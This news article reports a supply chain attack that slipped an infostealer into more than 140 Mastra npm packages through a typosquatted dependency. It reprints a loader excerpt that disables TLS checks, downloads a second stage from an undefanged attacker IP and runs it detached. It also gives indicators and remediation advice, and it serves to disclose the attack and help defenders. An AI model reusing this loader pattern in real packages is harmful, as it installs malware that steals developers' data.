GBHackers

Hackers Target npm Ecosystem by Compromising 140+ Mastra Packages


A large-scale software supply chain attack has compromised more than 140 npm packages under the widely used Mastra namespace, exposing developers, CI/CD pipelines, and enterprise environments to a stealthy cross-platform infostealer.

The campaign, uncovered by the Socket Research Team on June 17, 2026, used a typosquatted dependency, easy-day-js, to deliver its payload silently during package installation; Mastra's popularity in modern development workflows greatly widened the blast radius.

The attackers published 141 malicious package versions through a single npm account, “ehindero,” within a narrow time window. Notably, the actual @mastra/* package code remained unchanged, allowing the compromise to evade traditional source code reviews.

Instead, the compromise was introduced by adding a new dependency: easy-day-js, a typosquat of the legitimate dayjs library, was added to the package manifests of the affected @mastra/* versions, so the malicious code arrives transitively rather than in the Mastra packages themselves.

Version 1.11.22 of easy-day-js carries a postinstall script, so the payload runs automatically during npm install, before the developer has executed any code from the package.

Compromising 140+ Mastra Packages

The infection begins with a loader script (setup.cjs) that runs during installation. This script turns off TLS certificate validation, connects to attacker-controlled infrastructure, downloads a second-stage payload, runs it as a detached background process, and deletes itself to evade forensic detection.

// Loader excerpt (setup.cjs) as reproduced in the report; surrounding code is elided
process.env.NODE_TLS_REJECT_UNAUTHORIZED = '0';            // disable TLS certificate validation for the fetch below
const url = "https://23.254.164.92:8000/update/49890878";  // attacker-controlled staging server
const stage2 = await (await fetch(url)).text();            // pull the second stage (protocal.cjs)
// ... stage2 is written to disk at the path held in `out` (not shown in the excerpt) ...
child_process.spawn(process.execPath, [out, '23.254.164.123:443'], {   // run it under the current node binary, C2 passed as argv
  detached: true, stdio: 'ignore'                          // detached with no inherited stdio, so it outlives the install process
}).unref();                                                // let the installer exit without waiting on the child

The second-stage payload (protocal.cjs) is a persistent Node.js-based implant that executes arbitrary commands received from a command-and-control (C2) server.

It establishes persistence across Windows, macOS, and Linux systems using platform-specific mechanisms such as registry Run keys, LaunchAgents, and systemd services.

Beyond persistence, the malware performs host reconnaissance. It collects sensitive data, including browser history (Chrome, Edge, Brave) and inventories of cryptocurrency wallet extensions across 160+ wallets, such as MetaMask, Phantom, and Coinbase Wallet.

While the recovered sample primarily inventories extensions, its modular design allows attackers to deploy additional payloads for credential theft and further exploitation.

Indicators of Compromise (IOCs)

Type         Indicator
C2 IP        23[.]254[.]164[.]92
C2 IP        23[.]254[.]164[.]123
URL          https://23[.]254[.]164[.]92:8000/update/49890878
URL          https://23[.]254[.]164[.]123:443/49890878
File         protocal.cjs
File         .pkg_history / .pkg_logs
Persistence  NvmProtocal (Windows Run key)
Persistence  com.nvm.protocal (macOS LaunchAgent)
Service      nvmconf.service (Linux systemd unit)
SHA256       b122a9873bedf145ae2a7fd024b5f309007dbb025149f4dc4ac3f7e4f32a36a4
SHA256       221c45a790dec2a296af57969e1165a16f8f49733aeab64c0bbd768d9943badf

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.

One of the most concerning aspects of this campaign is that it executes during dependency installation, meaning even passive environments, such as CI runners or automated build systems, are at risk.

The inclusion of highly popular packages like @mastra/core (over 918K weekly downloads) amplifies the potential scale of compromise.

The malware’s ability to turn off TLS validation, use ICAP-like covert communication, and masquerade as legitimate Node/NVM components demonstrates a high level of sophistication. Additionally, reuse of tooling observed in earlier campaigns suggests an organized and evolving threat actor.

Security teams are advised to treat any system that has installed affected versions as compromised. Immediate actions include removing malicious package versions, deleting the node_modules directory, and reinstalling clean dependencies.

Persistence mechanisms must be manually eradicated, and all potentially exposed credentials, including npm tokens, cloud secrets, and SSH keys, should be rotated.

Organizations should also enforce stricter dependency controls, such as disabling install scripts (npm install --ignore-scripts, or ignore-scripts=true in .npmrc), implementing package allowlisting, and monitoring outbound network connections during builds.

This incident highlights the growing risk of transitive dependency attacks. It reinforces the need for runtime behavioral analysis alongside traditional code auditing.
